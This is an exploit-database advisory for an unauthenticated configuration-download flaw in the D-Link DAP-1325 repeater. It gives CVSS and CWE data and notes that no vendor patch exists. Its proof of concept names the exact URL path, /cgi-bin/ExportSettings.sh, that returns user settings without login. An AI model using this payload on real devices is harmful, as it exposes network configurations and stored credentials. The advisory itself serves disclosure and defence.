D-Link DAP-1325 - Broken Access Control

vendor:

D-Link DAP-1325

by:

ieduardogoncalves

7.5

CVSS

HIGH

Broken Access Control

284

CWE

Product Name: D-Link DAP-1325

Affected Version From: All versions

Affected Version To: Hardware version: A1, Firmware version: 1.01

Patch Exists: NO

Related CWE:

CPE: h:d-link:dap-1325

Metasploit:

Other Scripts:

Platforms Tested: All Platforms

2023

D-Link DAP-1325 – Broken Access Control

Unauthenticated access to settings or unauthenticated configuration download vulnerability in D-Link DAP-1325 allows the download of user settings without proper authentication.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability. It is recommended to ensure that the DAP-1325 device is not exposed to untrusted networks and to regularly check for firmware updates from the vendor.

Source

Exploit-DB raw data:

# Exploit Title: D-Link DAP-1325 - Broken Access Control
# Date: 27-06-2023
# Exploit Author: ieduardogoncalves
# Contact : twitter.com/0x00dia
# Vendor : www.dlink.com
# Version: Hardware version: A1 
# Firmware version: 1.01
# Tested on:All Platforms


1) Description

Security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.


IN MY CASE,
Tested repeater IP: http://192.168.0.21/

Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0

2) Proof of Concept

Step 1: Go to
Repeater Login Page : http://192.168.0.21/

Step 2:
Add the payload to URL.

Payload:
http://{ip}/cgi-bin/ExportSettings.sh

Payload:
https://github.com/eeduardogoncalves/exploit